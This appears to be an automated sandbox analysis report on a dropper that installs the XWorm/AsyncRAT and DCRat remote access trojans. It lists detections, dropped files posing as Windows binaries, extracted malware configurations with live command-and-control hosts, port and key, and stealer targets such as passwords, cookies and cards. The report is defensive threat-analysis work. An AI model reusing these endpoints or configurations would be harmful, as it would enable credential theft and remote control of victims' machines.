              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Users\user\AppData\Local\Temp\8o9UezPTg6.batAvira: detection malicious, Label: BAT/Delbat.C
              Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Users\user\cmd.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Program Files\Windows Mail\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Found malware configuration
              Source: 00000007.00000002.1384672432.0000000012BEF000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"H\":\";\",\"y\":\"$\",\"J\":\"^\",\"5\":\"&\",\"B\":\"_\",\"L\":\">\",\"I\":\"#\",\"a\":\"(\",\"U\":\".\",\"C\":\"`\",\"d\":\"!\",\"6\":\")\",\"x\":\"-\",\"c\":\"*\",\"4\":\",\",\"o\":\" \",\"S\":\"@\",\"0\":\"<\",\"h\":\"%\",\"M\":\"~\",\"z\":\"|\"}", "PCRT": "{\"v\":\";\",\"Q\":\"<\",\"6\":\"%\",\"B\":\"#\",\"R\":\"*\",\"U\":\"$\",\"Z\":\"(\",\"V\":\"~\",\"L\":\".\",\"3\":\">\",\"F\":\"|\",\"x\":\"-\",\"s\":\"@\",\"0\":\",\",\"J\":\")\",\"h\":\"!\",\"p\":\"`\",\"k\":\"_\",\"I\":\" \",\"T\":\"&\",\"H\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-CW0MLhmPnzDpkkOuZEHa", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://a1013249.xsph.ru/@=UGO0gTOkVjZ", "H2": "http://a1013249.xsph.ru/@=UGO0gTOkVjZ", "T": "0"}
              Source: 2.0.javaclient.exe.ec0000.0.unpackMalware Configuration Extractor: Xworm {"C2 url": ["light-liable.gl.at.ply.gg"], "Port": "10314", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
              Multi AV Scanner detection for domain / URL
              Source: a1013249.xsph.ruVirustotal: Detection: 12%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeReversingLabs: Detection: 87%
              Source: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeVirustotal: Detection: 68%Perma Link
              Source: C:\Componenthost\providerreviewdhcp.exeReversingLabs: Detection: 87%
              Source: C:\Componenthost\providerreviewdhcp.exeVirustotal: Detection: 68%Perma Link
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeReversingLabs: Detection: 87%
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeVirustotal: Detection: 68%Perma Link
              Source: C:\Program Files\Windows Mail\WmiPrvSE.exeReversingLabs: Detection: 87%
              Source: C:\Program Files\Windows Mail\WmiPrvSE.exeVirustotal: Detection: 68%Perma Link
              Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeReversingLabs: Detection: 87%
              Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeVirustotal: Detection: 68%Perma Link
              Source: C:\Recovery\csrss.exeReversingLabs: Detection: 87%
              Source: C:\Recovery\csrss.exeVirustotal: Detection: 68%Perma Link
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeReversingLabs: Detection: 87%
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeVirustotal: Detection: 68%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeReversingLabs: Detection: 70%
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeVirustotal: Detection: 59%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeReversingLabs: Detection: 91%
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeVirustotal: Detection: 67%Perma Link
              Source: C:\Users\user\cmd.exeReversingLabs: Detection: 87%
              Source: C:\Users\user\cmd.exeVirustotal: Detection: 68%Perma Link
              Multi AV Scanner detection for submitted file
              Source: cougif6lqM.exeReversingLabs: Detection: 78%
              Source: cougif6lqM.exeVirustotal: Detection: 59%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Componenthost\providerreviewdhcp.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeJoe Sandbox ML: detected
              Source: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeJoe Sandbox ML: detected
              Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeJoe Sandbox ML: detected
              Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeJoe Sandbox ML: detected
              Source: C:\Users\user\cmd.exeJoe Sandbox ML: detected
              Source: C:\Program Files\Windows Mail\WmiPrvSE.exeJoe Sandbox ML: detected
              Source: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: cougif6lqM.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 2.0.javaclient.exe.ec0000.0.unpackString decryptor: light-liable.gl.at.ply.gg
              Source: 2.0.javaclient.exe.ec0000.0.unpackString decryptor: 10314
              Source: 2.0.javaclient.exe.ec0000.0.unpackString decryptor: <123456789>
              Source: 2.0.javaclient.exe.ec0000.0.unpackString decryptor: <Xwormmm>
              Source: 2.0.javaclient.exe.ec0000.0.unpackString decryptor: XWorm V5.6
              Source: 2.0.javaclient.exe.ec0000.0.unpackString decryptor: USB.exe
              Source: 2.0.javaclient.exe.ec0000.0.unpackString decryptor: %Temp%
              Source: 2.0.javaclient.exe.ec0000.0.unpackString decryptor: JavaClient.exe
              Source: cougif6lqM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Componenthost\providerreviewdhcp.exeDirectory created: C:\Program Files\Windows Mail\WmiPrvSE.exeJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeDirectory created: C:\Program Files\Windows Mail\24dbde2999530eJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\886983d96e3d3eJump to behavior
              Source: cougif6lqM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DCRatBuild.exe, 00000003.00000003.1330292606.0000000006981000.00000004.00000020.00020000.00000000.sdmp, DCRatBuild.exe, 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp, DCRatBuild.exe, 00000003.00000000.1328766355.0000000000F33000.00000002.00000001.01000000.00000007.sdmp, DCRatBuild.exe.0.dr
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F0A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_00F0A5F4
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F1B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_00F1B8E0
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F2AAA8 FindFirstFileExA,3_2_00F2AAA8

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: light-liable.gl.at.ply.gg
              Source: Malware configuration extractorURLs: http://a1013249.xsph.ru/@=UGO0gTOkVjZ
              Source: global trafficTCP traffic: 192.168.2.9:49715 -> 147.185.221.17:10314
              Source: Joe Sandbox ViewIP Address: 147.185.221.17 147.185.221.17
              Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: a1013249.xsph.ru
              Source: global trafficDNS traffic detected: DNS query: light-liable.gl.at.ply.gg
              Source: powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: javaclient.exe, 00000002.00000002.3755345710.0000000003271000.00000004.00000800.00020000.00000000.sdmp, providerreviewdhcp.exe, 00000007.00000002.1383062846.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1410489959.000002264D7C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000017.00000002.1410489959.000002264D7C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

              Operating System Destruction

              barindex
              Protects its processes via BreakOnTermination flag
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: 01 00 00 00 Jump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 2.0.javaclient.exe.ec0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F0718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,3_2_00F0718C
              Source: C:\Users\user\Desktop\cougif6lqM.exeCode function: 0_2_00007FF886EE0A210_2_00007FF886EE0A21
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeCode function: 2_2_00007FF886ED79362_2_00007FF886ED7936
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeCode function: 2_2_00007FF886ED86E22_2_00007FF886ED86E2
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeCode function: 2_2_00007FF886ED16892_2_00007FF886ED1689
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeCode function: 2_2_00007FF886ED1FC52_2_00007FF886ED1FC5
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F0857B3_2_00F0857B
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F170BF3_2_00F170BF
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F0407E3_2_00F0407E
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F2D00E3_2_00F2D00E
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F311943_2_00F31194
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F202F63_2_00F202F6
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F0E2A03_2_00F0E2A0
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F032813_2_00F03281
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F166463_2_00F16646
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F027E83_2_00F027E8
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F137C13_2_00F137C1
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F2473A3_2_00F2473A
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F2070E3_2_00F2070E
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F0E8A03_2_00F0E8A0
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F0F9683_2_00F0F968
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F249693_2_00F24969
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F16A7B3_2_00F16A7B
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F13A3C3_2_00F13A3C
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F2CB603_2_00F2CB60
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F20B433_2_00F20B43
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F15C773_2_00F15C77
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F1FDFA3_2_00F1FDFA
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F13D6D3_2_00F13D6D
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F0ED143_2_00F0ED14
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F0DE6C3_2_00F0DE6C
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F0BE133_2_00F0BE13
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F20F783_2_00F20F78
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F05F3C3_2_00F05F3C
              Source: C:\Componenthost\providerreviewdhcp.exeCode function: 7_2_00007FF886EA35457_2_00007FF886EA3545
              Source: C:\Users\user\cmd.exeCode function: 29_2_00007FF886EB354529_2_00007FF886EB3545
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeCode function: 38_2_00007FF886ED354538_2_00007FF886ED3545
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeCode function: 40_2_00007FF886ED354540_2_00007FF886ED3545
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeCode function: 40_2_00007FF886EE159740_2_00007FF886EE1597
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeCode function: 41_2_00007FF886EB354541_2_00007FF886EB3545
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeCode function: 41_2_00007FF886EC159741_2_00007FF886EC1597
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeCode function: 42_2_00007FF886EE159742_2_00007FF886EE1597
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeCode function: 42_2_00007FF886ED354542_2_00007FF886ED3545
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: String function: 00F1E28C appears 35 times
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: String function: 00F1E360 appears 52 times
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: String function: 00F1ED00 appears 31 times
              Source: providerreviewdhcp.exe.3.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: cougif6lqM.exe, 00000000.00000002.1362339384.0000000003161000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamejavaclient.exe4 vs cougif6lqM.exe
              Source: cougif6lqM.exe, 00000000.00000002.1362339384.0000000003161000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs cougif6lqM.exe
              Source: cougif6lqM.exeBinary or memory string: OriginalFilenameJavaClientBeta.exe4 vs cougif6lqM.exe
              Source: cougif6lqM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 2.0.javaclient.exe.ec0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: cougif6lqM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: cougif6lqM.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9925503756830601
              Source: javaclient.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9923369193989071
              Source: javaclient.exe.0.dr, StlEUbFdJZHX9iqp9y0vGOLHru7O9CqwhAtkNxmmtIzacgnk1V1a8HJAfPU1Th8PIJHJOg.csCryptographic APIs: 'TransformFinalBlock'
              Source: javaclient.exe.0.dr, mRMv10HbZpwLFNjCwmoHBKxrw0NcMSjvzittQ7G5wQNBNo8SaleZ11W6JDVJ762DAuQ5l0.csCryptographic APIs: 'TransformFinalBlock'
              Source: javaclient.exe.0.dr, mRMv10HbZpwLFNjCwmoHBKxrw0NcMSjvzittQ7G5wQNBNo8SaleZ11W6JDVJ762DAuQ5l0.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, PVStjT4hn5scdS4lfYS.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, PVStjT4hn5scdS4lfYS.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, uPfSZV53W3JdoE5DHk8.csCryptographic APIs: 'TransformBlock'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, uPfSZV53W3JdoE5DHk8.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, PVStjT4hn5scdS4lfYS.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, PVStjT4hn5scdS4lfYS.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uPfSZV53W3JdoE5DHk8.csCryptographic APIs: 'TransformBlock'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uPfSZV53W3JdoE5DHk8.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, wxlCxPkYywwxbY5Yf0k.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, wxlCxPkYywwxbY5Yf0k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, wxlCxPkYywwxbY5Yf0k.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, wxlCxPkYywwxbY5Yf0k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: javaclient.exe.0.dr, ZPc799oFDlHD7nzPTpU9mHApETofsGEBQ5rjH5.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: javaclient.exe.0.dr, ZPc799oFDlHD7nzPTpU9mHApETofsGEBQ5rjH5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.evad.winEXE@45/32@2/1
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F06EC9 GetLastError,FormatMessageW,3_2_00F06EC9
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F19E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,3_2_00F19E1C
              Source: C:\Componenthost\providerreviewdhcp.exeFile created: C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exeJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cougif6lqM.exe.logJump to behavior
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
              Source: C:\Users\user\Desktop\cougif6lqM.exeMutant created: \Sessions\1\BaseNamedObjects\sOYAmJHoa0nevRYo5
              Source: C:\Componenthost\providerreviewdhcp.exeMutant created: \Sessions\1\BaseNamedObjects\Local\116774478796360b622de653c1d04ef9f7d2f9c3
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeMutant created: \Sessions\1\BaseNamedObjects\MdauxdZIJGVjqlHW
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_03
              Source: C:\Users\user\Desktop\cougif6lqM.exeFile created: C:\Users\user\AppData\Local\Temp\javaclient.exeJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat" "
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: sfxname3_2_00F1D5D4
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: sfxstime3_2_00F1D5D4
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: STARTDLG3_2_00F1D5D4
              Source: cougif6lqM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: cougif6lqM.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Componenthost\providerreviewdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Users\user\Desktop\cougif6lqM.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: cougif6lqM.exeReversingLabs: Detection: 78%
              Source: cougif6lqM.exeVirustotal: Detection: 59%
              Source: unknownProcess created: C:\Users\user\Desktop\cougif6lqM.exe "C:\Users\user\Desktop\cougif6lqM.exe"
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess created: C:\Users\user\AppData\Local\Temp\javaclient.exe "C:\Users\user\AppData\Local\Temp\javaclient.exe"
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
